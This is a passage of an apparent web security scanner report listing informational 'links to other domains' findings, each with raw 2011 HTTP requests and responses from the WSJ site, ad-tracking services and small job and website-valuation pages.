Path:   /internal/ModTwitWSJMarkets.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /internal/ModTwitWSJMarkets.htm?dojo.preventCache=1304320341570 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704473104576293321328159878.html?mod=WSJ_newsreel_markets
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=df918f0b-504c-492b-8824-dc0b9235aa6b; s_dbfe=1303590600843; wsjregion=na%2cus; s_vnum=1306182600841%26vn%3D2; __utmz=1.1304311304.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2267%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DMon%2C%2002%20May%202011%2005%3A00%3A36%20GMT%7C%7CweatherCode%3D10005; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; _chartbeat2=9b7spduc6sokdd53; rsi_csl=; rsi_segs=; __utma=1.1864565573.1304311304.1304311304.1304311304.1; __utmc=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:00 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 15:23:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 02:43:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html
Content-Length: 3277


<div class="headlineSummary twHeadline">
<h3>Latest Tweets</h3>
</div>
<div class="twLatestTweets headlineSummary twLatestTweets-av">
<ul class="twTweetsItem">


<li>


<a href="http://twitter.com/WSJDealJournal"> <img src="http://a1.twimg.com/profile_images/1206657804/wallstreet3_normal.JPG" alt="http://twitter.com/WSJDealJournal" /></a>
<p><a href="http://twitter.com/WSJDealJournal"><b>
...[SNIP]...
<span class="sourceLink">: Deal Journal: 'American Idol' Backer Robert Sillerman Launches New Media Venture <a href="http://bit.ly/eDTe4z">http://bit.ly/eDTe4z</a>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJDealJournal/statuses/34992944482099201">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJHeard"> <img src="http://a2.twimg.com/profile_images/117682816/twitter_heard_normal.jpg" alt="http://twitter.com/WSJHeard" /></a>
<p><a href="http://twitter.com/WSJHeard"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJHeard/statuses/34988503649492992">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJMarkets"> <img src="http://a2.twimg.com/profile_images/117675200/twitter_markets_normal.jpg" alt="http://twitter.com/WSJMarkets" /></a>
<p><a href="http://twitter.com/WSJMarkets"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJMarkets/statuses/34988187231191040">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJMarkets"> <img src="http://a2.twimg.com/profile_images/117675200/twitter_markets_normal.jpg" alt="http://twitter.com/WSJMarkets" /></a>
<p><a href="http://twitter.com/WSJMarkets"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJMarkets/statuses/34980255227707392">Moments ago</a>
...[SNIP]...
<li>


<a href="http://twitter.com/WSJDealJournal"> <img src="http://a1.twimg.com/profile_images/1206657804/wallstreet3_normal.JPG" alt="http://twitter.com/WSJDealJournal" /></a>
<p><a href="http://twitter.com/WSJDealJournal"><b>
...[SNIP]...
<span class="sourceLink">: Deal Journal: Deals of the Day: The Pritzker Empire Nears Its End <a href="http://bit.ly/eyPeO5">http://bit.ly/eyPeO5</a>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJDealJournal/statuses/34978350837530624">7 min ago</a>
...[SNIP]...
<li>
<a class="followTw" href="http://twitter.com/wsj">Follow WSJ on</a>
...[SNIP]...
23.37. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:08 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 376

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734228&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769%2C23864%2C57145%2C10047%2C17857%2C41538%2C13893%2C13899%2C13902%2C40657%2C26724%2C11262%2C1150"/>');
23.38. http://tags.bluekai.com/site/3945  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKW18109&t=2&rnd=792444851" width=1 height=1 border=0 alt="">
<img src="http://r.nexac.com/e/getdata.xgi?dt=br&pkey=ak930d7lx38dp&reppipe=%26phint%3D&repequal=%3D&ver=2&ru=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F1407%3Flimit%3D0%26ret%3Dpixel%26phint%3Dnaid%3d%3Cna_id%3E%26phint%3Dna_da%3D%3Cna_da%3E" width=1 height=1 border=0 alt="">
<img src="http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F3754%3Fphint%3Dea%25253D%257BEA_value%257D%26phint%3Deb%25253D%257BEB_value%257D%26phint%3Dec%25253D%257BEC_value%257D%26phint%3Ded%25253D%257BED_value%257D%26phint%3Dee%25253D%257BEE_value%257D%26ret%3Dhtml%26id%3DPARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...
23.39. http://tags.bluekai.com/site/3945  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f35; bk=iyfjJ95eAbmVIHOf; bkc=KJpn8s5QIwsRAzsD48XF/y1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmIeXK03G415mOCxIueI1pyqAg8Fn0n9SiPIeho2iQrOpzMWycJMmQ1JwSDqkmpSQXAW6L7ZlPPeBOfAwZx20cTyw9OinHmQ=; bko=KJ0pWVHQ1mU48XF//1FcynO88x84OxjJ/mF1iCtId9hPxBqJJEr9LLqLe9pfyvyfF9y1vR+Ons2KiaTZOkDQv8LcJJR/aVBZZ1xsRqW099YFQCSx; bkst=KJhkMg2ny69RCZXGYJgiTYQDO249d4prqGyNPGDxRguMTC6UCW9bCYEinnQUdTPruC5OOlayzcqhqlOyzUwNtAky4qf7d5blC88UWPoOEPPVAbbbYJbuc7gNSO+j83Q9fAvoM9k8TDHG1/axmImDD8Qej+wwKIIddl6CNkXXIFjG9psJ9EHkU9GiZ99Z2mZ0TUg+UInVG0tALIpuc3KitSzc8lv78m6GofZsoACc5qTfdOAXKc4ZlD66Mm/XELRjMoFrvebD5U1sJZogrpzok0l2ResYuL3j9Ay6oPJhGWHBFIfXK5OcvWO5bAyUU4sE5+0vZf77cdlaWQAQMm9YWNGxMncHCuVQee4SaZeNtI1XIxDtBPw5; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjJ1eB9cen0PeYIRxu8RfySHRSoARwMZ94Wo09VzemzXWeTa91YC/2L=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:00:18 GMT
Set-Cookie: bklc=4dbe1032; expires=Wed, 04-May-2011 02:00:18 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Ck/cgMBT0TsVIHOf; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAzsD48XFWy1nx0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjsHM9dcL33cpcEQRDwAQdM1Xs8vIq0XiysGk4QXS4RGnQzl/h1O0RpGeYEtks8ELtGwJOBnJ8+NPxpxK8e8AwzCI1eyOnk6DP; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQ1OnR8XF/R9BAZ4veVBbXWOREx0vDhzyyixtiMGBOkGIOR4wvcqTveJJ9NoAPmlp8sS39gJBn5QeNsg1p1myeLIT92SRLOgaDQShLcC9n91IJsWR=; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxCgz/YYRhQ3Dxnsyw27Bt+ppMsHVmWW2Evrb0ClOyvzn5iqPQcdynB3nRYa3/CRVNMqdOyLqmNgNDyqEwwmd1myl6LGpxWig0nO2UIP7gmVbQBTXtAVVmYr9rA13RQv5mO9REYnxpEMZamV9tdqgldL4XY+a82KMcGpUWJ9qxkcWois9YZBecLyr58k0Yg+SJKOa5BC4tU7r6Q4HyKsTwObnRoUr7ziFMjEICiRRic4x70UqF+dFGlHFFg3BKsYPHwOgi3vQmG768vDf9CmUWfG0pVj5t3b8vJKP19uSSD3ATDvvZll5Ils6MNWnPyJA3FmOc8SQDPyIK4fqgJCJ9s1WaJMxkssmMD6+9sVb6Ezc32b4SFPl822L4ANHiwy==; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aonQjgCACjWTC0U9hdWVutVqvymesVzkyQH6AjZzJ/Mw8ozDjsnu+Q/GjuCCm1/eWs19AJI26W6Rs4uxjJCujtlR/sVRDsU5fWnLWvQRCtUCg8M/0+eLy1vHJPevAQ1PKmYOzQYgpWA7sy97ic89279hLpQMdh9eeQTslArWa1XC+b26QKoQ3sHMt/LAy10hsAF7ZQVpSmxIWSxORLem2; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:00:18 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 1032
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKW18109&t=2&rnd=33632511" width=1 height=1 border=0 alt="">
<img src="http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F3754%3Fphint%3Dea%25253D%257BEA_value%257D%26phint%3Deb%25253D%257BEB_value%257D%26phint%3Dec%25253D%257BEC_value%257D%26phint%3Ded%25253D%257BED_value%257D%26phint%3Dee%25253D%257BEE_value%257D%26ret%3Dhtml%26id%3DPARTNER_UUID" width=1 height=1 border=0 alt="">
<img src="http://user.lucidmedia.com/clicksense/user?p=b3eff363c7abe313&r=1&" width=1 height=1 border=0 alt="">
<img src="http://adadvisor.net/adscores/g.pixel?sid=9204125787&bk_uuid=1FRgv9%2Fc99Y5TvhB&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2831%3Fphint%3Dzip%3D%25%7Bzip%7D%26phint%3Dage%3D%25%7Bindiv1.age%7D%26phint%3Dgender%3D%25%7Bindiv1.gender%7D%26phint%3Dsegment%3D%25%7Bscore%7D%26id=PARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...
23.40. http://usjobsresource.com/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /3/?s=31s-2100u HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</script>
<script src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTMwMzA2JmNfaWQ9MTMwNzYmY3BjPTEuMDYmcG9zPTEmaGFzaD00MTE0NGJlYTg3MzVlZTBjNjEzYjQzZTdiOGE3YWU3OA%3D%3D%3Bb2cac46ded3ebdbf905f9d9ba424eb62/jobkey-2af7295b5a9e2330be836b84fb8abc20e97b7bcf/pub_id-21012/cjp-0 target='_blank' onMouseDown='xml_sclk(this)'>New Business Development</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTI4NzgxJmNfaWQ9MTI1MjgmY3BjPTEuMDUmcG9zPTImaGFzaD04NmI5OGFlOGE2NmMxZTI0MDA4Y2JmYjgyYzM5OTUxMQ%3D%3D%3B4bb30824015f569c983e2979a00a5566/jobkey-ade9b22f6b49e83c98c8041821e3773de9410/pub_id-21012/cjp-1 target='_blank' onMouseDown='xml_sclk(this)'>New F&I Business Manager</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTg5NDcmY19pZD0xMDI2NCZjcGM9MC43MCZwb3M9MyZoYXNoPTRhZGY0MjU3OTk3OTgwZDU2YzNhMTZkOWQ3OTgzMmU0%3B91db1950f7cdc734a776895927154639/jobkey-15578.DUPE271649/pub_id-21012/cjp-2 target='_blank' onMouseDown='xml_sclk(this)'>Account Exec Business Sales</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTEzNTc4JmNfaWQ9NzM0NyZjcGM9MC41NSZwb3M9NCZoYXNoPTYyZGEwOGExMDI4YzQ4YTc4ZGExOTgzYWUxZmMxMzVk%3Bed5e85fbab4a8302df93a26f872d6f09/jobkey-74cafac3a1667f795e65408ddbc9efd20f4c7d/pub_id-21012/cjp-3 target='_blank' onMouseDown='xml_sclk(this)'>Business Development Support Specialist</a>
...[SNIP]...
</script>

All Content Copyright .. 2011, USJR, LLC. <a href="http://useducationresource.com/jobs/jobs/" target="_blank">Click here for Job Information.</a> | <a href="http://useducationresource.com/mobile/privacy.php" target="_blank">Become an Affiliate.</a>
...[SNIP]...
</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/7a8a3b31-6681-4d89-825a-d834c1016c24/mstag.js"></script>
...[SNIP]...
<noscript> <iframe src="//flex.atdmt.com/mstag/tag/7a8a3b31-6681-4d89-825a-d834c1016c24/conversion.html?cp=5050&dedup=1" frameborder="0" scrolling="no" width="1" height="1" style="visibility:hidden; display:none"> </iframe>
...[SNIP]...
23.41. http://websiteprice.net/result/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /result/?id=65934 HTTP/1.1
Host: websiteprice.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Mon, 02 May 2011 02:12:54 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:14:04 GMT
Content-Length: 10437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794251&afsid=1">Your Ad Here</a>
...[SNIP]...
<div class="thumb">
<a href="http://onlinemicrofiche.com" target="_blank">
<img src="../thumb/?url_pic=onlinemicrofiche.com" alt="onlinemicrofiche.com" width="120" height="90" />
...[SNIP]...
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794251&afsid=1">Your Ad Here</a>
...[SNIP]...
